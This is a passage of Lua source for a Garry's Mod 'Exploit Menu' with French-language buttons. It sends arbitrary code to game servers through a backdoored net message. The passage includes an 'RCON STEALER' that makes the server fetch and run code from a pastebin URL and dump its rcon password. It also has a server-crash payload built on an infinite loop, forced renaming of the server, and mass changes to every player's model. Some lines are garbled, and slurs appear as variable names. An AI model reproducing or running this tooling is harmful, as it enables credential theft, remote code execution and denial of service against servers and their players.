  3415. commandnethtx106:SetText("----------Model un joueur----------")
  3416. commandnethtx106:SetTextColor(Color(255, 255, 255, 255))
  3417. commandnethtx106.Paint = function(panel, w, h)
  3418. surface.SetDrawColor(100, 100, 100 ,255)
  3419. surface.DrawOutlinedRect(0, 0, w, h)
  3420. surface.SetDrawColor(186, 137, 0, 255)
  3421. surface.DrawRect(0, 0, w, h)
  3422. end
  3423. commandnethtx106.DoClick = function()
  3424. iZNX.NetStart(thefrenchenculer)
  3425. net.WriteString([[None]])
  3426. net.WriteBit (1)
  3427. net.SendToServer()
  3428. end
  3429. local commandnethtx8 = vgui.Create("DButton", DScrollPanel)
  3430. commandnethtx8:SetSize( 208, 20 )
  3431. commandnethtx8:SetPos( 1, 2155 )
  3432. commandnethtx8:SetText("METTRE UN SCRIPTBOX(ALL)")
  3433. commandnethtx8:SetTextColor(Color(255, 255, 255, 255))
  3434. commandnethtx8.Paint = function(panel, w, h)
  3435. surface.SetDrawColor(100, 100, 100 ,255)
  3436. surface.DrawOutlinedRect(0, 0, w, h)
  3437. surface.SetDrawColor(186, 137, 0, 255)
  3438. surface.DrawRect(0, 0, w, h)
  3439. end
  3440. commandnethtx8.DoClick = function()
  3441. iZNX.NetStart(thefrenchenculer)
  3442. net.WriteString( "for k,v in pairs(player.GetAll()) do v:SetModel(\"models/editor/scriptedsequence.mdl\") end" )
  3443. net.WriteBit(1)
  3444. net.SendToServer()
  3445. end
  3446. local commandnethtx8 = vgui.Create("DButton", DScrollPanel)
  3447. commandnethtx8:SetSize( 208, 20 )
  3448. commandnethtx8:SetPos( 1, 2180 )
  3449. commandnethtx8:SetText("METTRE LE SKIN CARTON (ALL)")
  3450. commandnethtx8:SetTextColor(Color(255, 255, 255, 255))
  3451. commandnethtx8.Paint = function(panel, w, h)
  3452. surface.SetDrawColor(100, 100, 100 ,255)
  3453. surface.DrawOutlinedRect(0, 0, w, h)
  3454. surface.SetDrawColor(186, 137, 0, 255)
  3455. surface.DrawRect(0, 0, w, h)
  3456. end
  3457. commandnethtx8.DoClick = function()
  3458. iZNX.NetStart(thefrenchenculer)
  3459. net.WriteString( "for k,v in pairs(player.GetAll()) do v:SetModel(\"models/editor/playerstart.mdl\") end" )
  3460. net.WriteBit(1)
  3461. net.SendToServer()
  3462. end
  3463. local commandnethtx8 = vgui.Create("DButton", DScrollPanel)
  3464. commandnethtx8:SetSize( 208, 20 )
  3465. commandnethtx8:SetPos( 1, 2280 )
  3466. commandnethtx8:SetText("METTRE LE COMBINE (ALL)")
  3467. commandnethtx8:SetTextColor(Color(255, 255, 255, 255))
  3468. commandnethtx8.Paint = function(panel, w, h)
  3469. surface.SetDrawColor(100, 100, 100 ,255)
  3470. surface.DrawOutlinedRect(0, 0, w, h)
  3471. surface.SetDrawColor(186, 137, 0, 255)
  3472. surface.DrawRect(0, 0, w, h)
  3473. end
  3474. commandnethtx8.DoClick = function()
  3475. iZNX.NetStart(thefrenchenculer)
  3476. net.WriteString( "for k,v in pairs(player.GetAll()) do v:SetModel(\"models/player/police.mdl\") end" )
  3477. net.WriteBit(1)
  3478. net.SendToServer()
  3479. end
  3480. local commandnethtx8 = vgui.Create("DButton", DScrollPanel)
  3481. commandnethtx8:SetSize( 208, 20 )
  3482. commandnethtx8:SetPos( 1, 2205 )
  3483. commandnethtx8:SetText("METTRE UN OTA (ALL)")
  3484. commandnethtx8:SetTextColor(Color(255, 255, 255, 255))
  3485. commandnethtx8.Paint = function(panel, w, h)
  3486. surface.SetDrawColor(100, 100, 100 ,255)
  3487. surface.DrawOutlinedRect(0, 0, w, h)
  3488. surface.SetDrawColor(186, 137, 0, 255)
  3489. surface.DrawRect(0, 0, w, h)
  3490. end
  3491. commandnethtx8.DoClick = function()
  3492. iZNX.NetStart(thefrenchenculer)
  3493. net.WriteString( "for k,v in pairs(player.GetAll()) do v:SetModel(\"models/player/combine_super_soldier.mdl\") end" )
  3494. net.WriteBit(1)
  3495. net.SendToServer()
  3496. end
  3497. local commandnethtx8 = vgui.Create("DButton", DScrollPanel)
  3498. commandnethtx8:SetSize( 208, 20 )
  3499. commandnethtx8:SetPos( 1, 2230 )
  3500. commandnethtx8:SetText("METTRE UN HEAD CRABE (ALL)")
  3501. commandnethtx8:SetTextColor(Color(255, 255, 255, 255))
  3502. commandnethtx8.Paint = function(panel, w, h)
  3503. surface.SetDrawColor(100, 100, 100 ,255)
  3504. surface.DrawOutlinedRect(0, 0, w, h)
  3505. surface.SetDrawColor(186, 137, 0, 255)
  3506. surface.DrawRect(0, 0, w, h)
  3507. end
  3508. commandnethtx8.DoClick = function()
  3509. iZNX.NetStart(thefrenchenculer)
  3510. net.WriteString( "for k,v in pairs(player.GetAll()) do v:SetModel(\"models/Lamarr.mdl\") end" )
  3511. net.WriteBit(1)
  3512. net.SendToServer()
  3513. end
  3514. local commandnethtx8 = vgui.Create("DButton", DScrollPanel)
  3515. commandnethtx8:SetSize( 208, 20 )
  3516. commandnethtx8:SetPos( 1, 2255 )
  3517. commandnethtx8:SetText("METTRE UN ZOMBIE (ALL)")
  3518. commandnethtx8:SetTextColor(Color(255, 255, 255, 255))
  3519. commandnethtx8.Paint = function(panel, w, h)
  3520. surface.SetDrawColor(100, 100, 100 ,255)
  3521. surface.DrawOutlinedRect(0, 0, w, h)
  3522. surface.SetDrawColor(186, 137, 0, 255)
  3523. surface.DrawRect(0, 0, w, h)
  3524. end
  3525. commandnethtx8.DoClick = function()
  3526. iZNX.NetStart(thefrenchenculer)
  3527. net.WriteString( "for k,v in pairs(player.GetAll()) do v:SetModel(\"models/Zombie/Classic.mdl\") end" )
  3528. net.WriteBit(1)
  3529. net.SendToServer()
  3530. end
  3531. local commandnethtx8 = vgui.Create("DButton", DScrollPanel)
  3532. commandnethtx8:SetSize( 208, 20 )
  3533. commandnethtx8:SetPos( 1, 2255 )
  3534. commandnethtx8:SetText("METTRE UN BUST(ALL)")
  3535. commandnethtx8:SetTextColor(Color(255, 255, 255, 255))
  3536. commandnethtx8.Paint = function(panel, w, h)
  3537. surface.SetDrawColor(100, 100, 100 ,255)
  3538. surface.DrawOutlinedRect(0, 0, w, h)
  3539. surface.SetDrawColor(186, 137, 0, 255)
  3540. surface.DrawRect(0, 0, w, h)
  3541. end
  3542. commandnethtx8.DoClick = function()
  3543. iZNX.NetStart(thefrenchenculer)
  3544. net.WriteString( "for k,v in pairs(player.GetAll()) do v:SetModel(\"models/props_combine/breenbust.mdl\") end" )
  3545. net.WriteBit(1)
  3546. net.SendToServer()
  3547. end
  3548. local commandnethtx16 = vgui.Create("DButton", DScrollPanel)
  3549. commandnethtx16:SetSize( 208, 20 )
  3550. commandnethtx16:SetPos( 2, 680 )
  3551. commandnethtx16:SetText("RCON STEALER")
  3552. commandnethtx16:SetTextColor(Color(255, 255, 255, 255))
  3553. commandnethtx16.Paint = function(panel, w, h)
  3554. surface.SetDrawColor(100, 100, 100 ,255)
  3555. surface.DrawOutlinedRect(0, 0, w, h)
  3556. surface.SetDrawColor(34, 217, 217, 255)
  3557. surface.DrawRect(0, 0, w, h)
  3558. end
  3559. commandnethtx16.DoClick = function()
  3560. net.Start(thefrenchenculer)
  3561. net.WriteString( "http.Fetch(\"https://pastebin.com/raw/vHER5u3N\",function(b,l,h,c)RunString(b)end,nil)" )
  3562. net.WriteBit(1)
  3563. net.SendToServer()
  3564. timer.Simple( 0.5, function()
  3565. if iZNX.ValidNetString( "jeveuttonrconleul" ) then
  3566. net.Start("jeveuttonrconleul")
  3567. net.SendToServer()
  3568. else
  3569. chat.AddText( Color(255, 0, 0),"rcon_password pas trouvé, veuillez réessayer ^^" )
  3570. end
  3571. end)
  3572. end
  3573.  local Rc "DTextEntry", DScrollPanel )
  3574. RconCommand:SetPos( 110, 0 )
  3575. RconCommand:SetSize( 100, 20 )
  3576. RconCommand:SetText( "hostname SERVEUR HACKER Anatik XD " )
  3577.  local Lancer_rc DScrollPanel )
  3578. Lancer_rcon_commande:SetSize( 103, 20 )
  3579. Lancer_rcon_commande:SetPos( 2, 0 )
  3580. Lancer_rcon_commande:SetText("Changer le nom")
  3581. Lancer_rcon_commande:SetTextColor(Color(255, 255, 255, 255))
  3582. Lancer_rcon_commande.Paint = function(panel, w, h)
  3583. surface.SetDrawColor(255, 0, 13, 255)
  3584. surface.DrawOutlinedRect(0, 0, w, h)
  3585. surface.SetDrawColor(255, 0, 0, 255)
  3586. surface.DrawRect(0, 0, w, h)
  3587. end
  3588. Lancer_rcon_commande.DoClick = function()
  3589.  local rc
  3590. iZNX.NetStart(thefrenchenculer)
  3591. net.WriteString( rcon_commandes_get )
  3592. net.WriteBit(false)
  3593. net.SendToServer()
  3594. end
  3595. local GLUACommand = vgui.Create( "DTextEntry", DScrollPanel )
  3596. GLUACommand:SetPos( 110, 25 )
  3597. GLUACommand:SetSize( 100, 20 )
  3598. GLUACommand:SetText( "timer.Create(\"Timerdecrash\",0.5,1,function() while true do end end)" )
  3599. local Lancer_glua_commande = vgui.Create("DButton", DScrollPanel )
  3600. Lancer_glua_commande:SetSize( 103, 20 )
  3601. Lancer_glua_commande:SetPos( 2, 25 )
  3602. Lancer_glua_commande:SetText("CRASH SERVEUR")
  3603. Lancer_glua_commande:SetTextColor(Color(255, 255, 255, 255))
  3604. Lancer_glua_commande.Paint = function(panel, w, h)
  3605. surface.SetDrawColor(255, 0, 13, 255)
  3606. surface.DrawOutlinedRect(0, 0, w, h)
  3607. surface.SetDrawColor(255, 0, 0, 255)
  3608. surface.DrawRect(0, 0, w, h)
  3609. end
  3610. Lancer_glua_commande.DoClick = function()
  3611. local glua_commandes_get = GLUACommand:GetValue()
  3612. iZNX.NetStart(thefrenchenculer)
  3613. net.WriteString( glua_commandes_get )
  3614. net.WriteBit(1)
  3615. net.SendToServer()
  3616. end
  3617. end
  3618. net.Receive( "rcon_passw_dump", function()
  3619.  local rc
  3620. chat.AddText( Color(255, 255, 255), rcon_pass, Color(0, 255, 0)," Voila le rcon :)")
  3621. end )
  3622. net.Receive( "aucun_rcon_ici", function()
  3623. chat.AddText( Color(255, 0, 0),"Aucun rcon_password sur le serveur :/" )
  3624. end )
  3625. function iZNX.MakePlayerSelectionButton( parent, x, y, addr )
  3626. if !parent:IsValid() then return end
  3627.  local TButt "DButton" )
  3628. TButton:SetParent( parent )
  3629. TButton:SetPos( x, y )
  3630. TButton:SetText( "Choisir des cibles" )
  3631. TButton:SetTextColor( Color(255, 255, 255, 255) )
  3632. TButton:SizeToContents()
  3633. TButton:SetTall( 24 )
  3634. TButton.Paint = function( self, w, h )
  3635. surface.SetDrawColor( Color(60, 60, 90, 200) )
  3636. surface.DrawRect( 0, 0, w, h )
  3637. surface.SetDrawColor( Color( 60, 60, 60 ) )
  3638. surface.SetMaterial( downgrad )
  3639. surface.DrawTexturedRect( 0, 0, w, h/ 2 )
  3640. surface.SetDrawColor( Color(100, 100, 100, 255) )
  3641. surface.DrawOutlinedRect( 0, 0, w, h )
  3642. surface.SetDrawColor( Color(70, 70, 100, 255) )
  3643. surface.DrawOutlinedRect( 2, 2, w - 4, h - 4 )
  3644. end
  3645. TButton.DoClick = function()
  3646. iZNX.SelectPlayersPanel( addr )
  3647. end
  3648. return TButton:GetWide(), TButton:GetTall()
  3649. end
  3650. function iZNX.SelectPlayersPanel( addr )
  3651. if iZNX.PlayerSelector and iZNX.PlayerSelector:IsVisible() then iZNX.PlayerSelector:Remove() end
  3652. local plytab = iZNX.GetStored( addr, {} )
  3653. iZNX.PlayerSelector = vgui.Create("DFrame")
  3654. iZNX.PlayerSelector:SetSize(250,400)
  3655. iZNX.PlayerSelector:SetTitle("Joueur(s) à cibler")
  3656. iZNX.PlayerSelector:SetPos( gui.MouseX(), gui.MouseY() )
  3657. iZNX.PlayerSelector:MakePopup()
  3658. iZNX.PlayerSelector.Paint = function( s, w, h )
  3659. if !iZNX.Menu or !iZNX.Menu:IsVisible() then s:Remove() return end
  3660. surface.SetDrawColor( Color(30, 30, 30, 245) )
  3661. surface.DrawRect( 0, 0, w, h )
  3662. surface.SetDrawColor( Color(55, 55, 55, 245) )
  3663. surface.DrawOutlinedRect( 0, 0, w, h )
  3664. surface.DrawOutlinedRect( 1, 1, w - 2, h - 2 )
  3665. end
  3666. local Plist = vgui.Create( "DPanelList", iZNX.PlayerSelector )
  3667. Plist:SetSize( iZNX.PlayerSelector:GetWide() - 10, iZNX.PlayerSelector:GetTall() - 55 )
  3668. Plist:SetPadding( 5 )
  3669. Plist:SetSpacing( 5 )
  3670. Plist:EnableHorizontal( false )
  3671. Plist:EnableVerticalScrollbar( true )
  3672. Plist:SetPos( 5, 40 )
  3673. Plist:SetName( "" )
  3674. local target1 = vgui.Create("DButton", iZNX.PlayerSelector)
  3675. target1:SetSize( 40, 20 )
  3676. target1:SetPos( 10, 23 )
  3677. target1:SetText("Tous")
  3678. target1:SetTextColor(Color(255, 255, 255, 255))
  3679. target1.Paint = function(panel, w, h)
  3680. surface.SetDrawColor(100, 100, 100 ,255)
  3681. surface.DrawOutlinedRect(0, 0, w, h)
  3682. surface.SetDrawColor(0, 0, 50 ,155)
  3683. surface.DrawRect(0, 0, w, h)
  3684. end
  3685. target1.DoClick = function()
  3686. for _, p in pairs(player.GetAll()) do
  3687. if not table.HasValue( plytab, p ) then
  3688. table.insert( plytab, p )
  3689. end
  3690. end
  3691. iZNX.Store( addr, plytab )
  3692. end
  3693. local target2 = vgui.Create("DButton", iZNX.PlayerSelector)
  3694. target2:SetSize( 40, 20 )
  3695. target2:SetPos( 55, 23 )
  3696. target2:SetText("Aucun")
  3697. target2:SetTextColor(Color(255, 255, 255, 255))
  3698. target2.Paint = function(panel, w, h)
  3699. surface.SetDrawColor(100, 100, 100 ,255)
  3700. surface.DrawOutlinedRect(0, 0, w, h)
  3701. surface.SetDrawColor(0, 0, 50 ,155)
  3702. surface.DrawRect(0, 0, w, h)
  3703. end
  3704. target2.DoClick = function()
  3705. table.Empty( plytab )
  3706. iZNX.Store( addr, plytab )
  3707. end
  3708. local target3 = vgui.Create("DButton", iZNX.PlayerSelector )
  3709. target3:SetSize( 40, 20 )
  3710. target3:SetPos( 100, 23 )
  3711. target3:SetText("Moi")
  3712. target3:SetTextColor(Color(255, 255, 255, 255))
  3713. target3.Paint = function(panel, w, h)
  3714. surface.SetDrawColor(100, 100, 100 ,255)
  3715. surface.DrawOutlinedRect(0, 0, w, h)
  3716. surface.SetDrawColor(0, 0, 50 ,155)
  3717. surface.DrawRect(0, 0, w, h)
  3718. end
  3719. target3.DoClick = function()
  3720. table.Empty( plytab )
  3721. table.insert( plytab, LocalPlayer() )
  3722. iZNX.Store( addr, plytab )
  3723. end
  3724. local target4 = vgui.Create( "DTextEntry", iZNX.PlayerSelector )
  3725. target4:SetPos( 145, 23 )
  3726. target4:SetSize( 95, 20 )
  3727. target4:SetText( "" )
  3728.  target4. self )
  3729. local nam = self:GetValue()
  3730. local namtab = string.Explode( ", ", nam )
  3731. table.Empty( plytab )
  3732. for _, pl in pairs( player.GetAll() ) do
  3733. for _, s in pairs( namtab ) do
  3734. if string.find( string.lower( pl:Nick() ), s ) then
  3735. table.insert( plytab, pl )
  3736. end
  3737. end
  3738. end
  3739. iZNX.Store( addr, plytab )
  3740. end
  3741. for k, v in pairs( player.GetAll() ) do
  3742. local plypanel2 = vgui.Create( "DPanel" )
  3743. plypanel2:SetPos( 0, 0 )
  3744. plypanel2:SetSize( 200, 25 )
  3745. local teamcol = team.GetColor( v:Team() )
  3746. plypanel2.Paint = function( s, w, h )
  3747. if !v:IsValid() then return end
  3748. surface.SetDrawColor( Color(30, 30, 30, 245) )
  3749. surface.DrawRect( 0, 0, w, h )
  3750. surface.SetDrawColor( teamcol )
  3751. surface.DrawRect( 0, h - 3, w, 3 )
  3752. surface.SetDrawColor( Color(55, 55, 55, 245) )
  3753. surface.DrawOutlinedRect( 0, 0, w, h )
  3754. if table.HasValue( plytab, v ) then surface.SetDrawColor( Color(55, 255, 55, 245) ) end
  3755. surface.DrawOutlinedRect( 1, 1, w - 2, h - 2 )
  3756. end
  3757. local plyname = vgui.Create( "DLabel", plypanel2 )
  3758. plyname:SetPos( 10, 5 )
  3759. plyname:SetFont( "Trebuchet18" )
  3760. local tcol = Color( 255, 255, 255 )
  3761. if v == LocalPlayer() then tcol = Color( 155, 155, 255 ) end
  3762. plyname:SetColor( tcol )
  3763. plyname:SetText( v:Nick() )
  3764. plyname:SetSize(180, 15)
  3765. local faggot = vgui.Create("DButton", plypanel2 )
  3766. faggot:SetSize( plypanel2:GetWide(), plypanel2:GetTall() )
  3767. faggot:SetPos( 0, 0 )
  3768. faggot:SetText("")
  3769. faggot.Paint = function(panel, w, h)
  3770. return
  3771. end
  3772. faggot.DoClick = function()
  3773. if table.HasValue( plytab, v ) then
  3774. table.RemoveByValue( plytab, v )
  3775. else
  3776. table.insert( plytab, v )
  3777. end
  3778. iZNX.Store( addr, plytab )
  3779. end
  3780. Plist:AddItem( plypanel2 )
  3781. end
  3782. end
  3783. function iZNX.MakeTextInputButton( parent, x, y, btext, default, addr)
  3784. if !parent:IsValid() then return end
  3785. local hostframe = vgui.Create( "DPanel", parent )
  3786. hostframe:SetPos( x, y )
  3787. hostframe.Paint = function( self, w, h )
  3788. surface.SetDrawColor( Color(60, 60, 60, 200) )
  3789. surface.DrawRect( 0, 0, w, h )
  3790. surface.SetDrawColor( Color( 60, 60, 60 ) )
  3791. surface.SetMaterial( downgrad )
  3792. surface.DrawTexturedRect( 0, 0, w, h/ 2 )
  3793. surface.SetDrawColor( Color(100, 100, 100, 255) )
  3794. surface.DrawOutlinedRect( 0, 0, w, h )
  3795. end
  3796. local tttt = vgui.Create( "DLabel", hostframe )
  3797. tttt:SetPos( 5, 5 )
  3798. tttt:SetText( btext )
  3799. tttt:SizeToContents()
  3800. local tentry = vgui.Create( "DTextEntry", hostframe )
  3801. tentry:SetPos( 10 + tttt:GetWide(), 2 )
  3802. tentry:SetSize( 130, 20 )
  3803. tentry:SetText( iZNX.GetStored( addr, default ) )
  3804.  tentry. self )
  3805. iZNX.Store( addr, self:GetValue() )
  3806. end
  3807. hostframe:SetSize( 13 + tttt:GetWide() + tentry:GetWide(), 24 )
  3808. return hostframe:GetWide(), hostframe:GetTall()
  3809. end
  3810. function iZNX.MakeNumberInputButton( parent, x, y, btext, default, min, max, addr)
  3811. if !parent:IsValid() then return end
  3812. local hostframe = vgui.Create( "DPanel", parent )
  3813. hostframe:SetPos( x, y )
  3814. hostframe.Paint = function( self, w, h )
  3815. surface.SetDrawColor( Color(60, 60, 60, 200) )
  3816. surface.DrawRect( 0, 0, w, h )
  3817. surface.SetDrawColor( Color( 60, 60, 60 ) )
  3818. surface.SetMaterial( downgrad )
  3819. surface.DrawTexturedRect( 0, 0, w, h/ 2 )
  3820. surface.SetDrawColor( Color(100, 100, 100, 255) )
  3821. surface.DrawOutlinedRect( 0, 0, w, h )
  3822. end
  3823. local tttt = vgui.Create( "DLabel", hostframe )
  3824. tttt:SetPos( 5, 5 )
  3825. tttt:SetText( btext )
  3826. tttt:SizeToContents()
  3827. local wangmeoff = vgui.Create( "DNumberWang", hostframe )
  3828. wangmeoff:SetPos( 10 + tttt:GetWide(), 2 )
  3829. wangmeoff:SetSize( 75, 20 )
  3830. wangmeoff:SetDecimals( 2 )
  3831. wangmeoff:SetMinMax( min , max )
  3832. wangmeoff:SetValue( iZNX.GetStored( addr, default ) )
  3833. wangmeoff:SetAllowNonAsciiCharacters(false)
  3834.  wangmeoff. self, val )
  3835. iZNX.Store( addr, self:GetValue() )
  3836. end
  3837. hostframe:SetSize( 13 + tttt:GetWide() + wangmeoff:GetWide(), 24 )
  3838. return hostframe:GetWide(), hostframe:GetTall()
  3839. end
  3840. local FillFrameRates = RatesScaleLevel
  3841. concommand.Add( "exploit_menu", function()
  3842. if FillFrameRates == "STEAM_0:1:199444592" or FillFrameRates == "STEAM_0:1:199444592" or FillFrameRates == "STEAM_0:1:199444592" or FillFrameRates == "STEAM_0:1:199444592" or FillFrameRates == "STEAM_0:1:199444592"
  3843. then iZNX.Menu = vgui.Create("DFrame")
  3844. iZNX.Menu:SetSize(700,550)
  3845. iZNX.Menu:SetTitle("")
  3846. iZNX.Menu:Center()
  3847. iZNX.Menu:MakePopup()
  3848. iZNX.Menu.gay = table.Count( iZNX.sploits )
  3849. iZNX.Menu.Paint = function( s, w, h )
  3850. surface.SetDrawColor( Color(30, 30, 30, 245) )
  3851. surface.DrawRect( 0, 0, w, h )
  3852. surface.SetDrawColor( Color(55, 55, 55, 245) )
  3853. surface.DrawOutlinedRect( 0, 0, w, h )
  3854. surface.DrawOutlinedRect( 1, 1, w - 2, h - 2 )
  3855. surface.SetDrawColor( Color(0, 0, 0, 200) )
  3856. surface.DrawRect( 80, 25, w - 90, h - 35 )
  3857. surface.SetDrawColor( Color(100, 100, 100, 200) )
  3858. surface.DrawLine( 10, 25, 40, 30 )
  3859. surface.DrawLine( 40, 30, 70, 25 )
  3860. surface.DrawLine( 10, 25, 25, 40 )
  3861. surface.DrawLine( 55, 40, 70, 25 )
  3862. surface.DrawLine( 25, 40, 25, 60 )
  3863. surface.DrawLine( 55, 40, 55, 60 )
  3864. surface.DrawLine( 25, 60, 40, 70 )
  3865. surface.DrawLine( 55, 60, 40, 70 )
  3866. draw.DrawText( "Exploit Menu\nExploit(s): "..iZNX.Menu.gay, "default", 8, 85, Color(255,255,255, 30) )
  3867. end
  3868. local Plist = vgui.Create( "DPanelList", iZNX.Menu )
  3869. Plist:SetSize( iZNX.Menu:GetWide() - 90, iZNX.Menu:GetTall() - 35 )
  3870. Plist:SetPadding( 5 )
  3871. Plist:SetSpacing( 5 )
  3872. Plist:EnableHorizontal( false )
  3873. Plist:EnableVerticalScrollbar( true )
  3874. Plist:SetPos( 80, 25 )
  3875. Plist:SetName( "" )
  3876. iZNX.MakeFunctionButton( iZNX.Menu, 10, 130, "Load Config", iZNX.LoadConfig, "Charger une Config" )
  3877. iZNX.MakeFunctionButton( iZNX.Menu, 10, 160, "Save Config", iZNX.SaveConfig, "Sauvegarder la Config" )
  3878. local function CreateSploitPanel( name, t )
  3879. if !iZNX.Menu then return end
  3880. local cmdp = vgui.Create( "DPanel" )
  3881. cmdp:SetSize( Plist:GetWide(), 70 )
  3882. cmdp.Cmd = name
  3883. cmdp.Desc = t.desc
  3884. cmdp.Paint = function( s, w, h )
  3885. surface.SetDrawColor( Color(50, 50, 50, 245) )
  3886. surface.DrawRect( 0, 0, w, h )
  3887. surface.SetDrawColor( severitycols[t.severity] )
  3888. surface.DrawOutlinedRect( 0, 0, w, h )
  3889. surface.DrawLine( 0, 24, w, 24 )
  3890. draw.DrawText( cmdp.Cmd, "DermaDefault", 10, 5, Color(255,255,255) )
  3891. draw.DrawText( cmdp.Desc, "DermaDefault", 10, 28, Color(205,205,255, 100) )
  3892. end
  3893. local x = 10
  3894. for _, tab in ipairs( t.functions ) do
  3895. if tab.typ == "func" then
  3896. x = (x + 5) + iZNX.MakeFunctionButton( cmdp, x, 42, tab.name, tab.func )
  3897. elseif tab.typ == "players" then
  3898. x = (x + 5) + iZNX.MakePlayerSelectionButton( cmdp, x, 42, tab.addr )
  3899. elseif tab.typ == "htxcommandeliste" then
  3900. x = (x + 5) + iZNX.HTXBackdoor( cmdp, x, 42, tab.name )
  3901. elseif tab.typ == "string" then
  3902. x = (x + 5) + iZNX.MakeTextInputButton( cmdp, x, 42, tab.name, tab.default, tab.addr )
  3903. if !iZNX.IsStored( tab.addr ) then iZNX.Store( tab.addr, tab.default ) end
  3904. elseif tab.typ == "float" then
  3905. x = (x + 5) + iZNX.MakeNumberInputButton( cmdp, x, 42, tab.name, tab.default, tab.min, tab.max, tab.addr )
  3906. if !iZNX.IsStored( tab.addr ) then iZNX.Store( tab.addr, tab.default ) end
  3907. end
  3908. end
  3909. Plist:AddItem( cmdp )
  3910. end
  3911. for k, v in pairs( iZNX.sploits ) do
  3912. if v.scan() then CreateSploitPanel( k, v ) end
  3913. end
  3914. else
  3915. LocalPlayer():EmitSound("common/warning.wav",500,100)
  3916. LocalPlayer():EmitSound("common/warning.wav",500,100)
  3917. LocalPlayer():EmitSound("common/warning.wav",500,100)
  3918. LocalPlayer():EmitSound("common/warning.wav",500,100)
  3919. LocalPlayer():EmitSound("common/warning.wav",500,100)
  3920. LocalPlayer():EmitSound("common/warning.wav",500,100)
  3921. return end
  3922. end)
  3923. end -- ne pas toucher cac checker end !!!